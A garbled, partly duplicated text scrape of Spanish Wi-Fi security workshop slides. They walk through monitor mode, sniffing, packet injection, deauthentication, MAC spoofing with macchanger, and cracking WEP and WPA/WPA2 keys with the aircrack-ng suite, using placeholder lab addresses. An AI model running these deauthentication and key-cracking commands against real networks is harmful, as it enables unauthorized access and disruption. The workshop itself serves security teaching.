httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 27: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 28: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

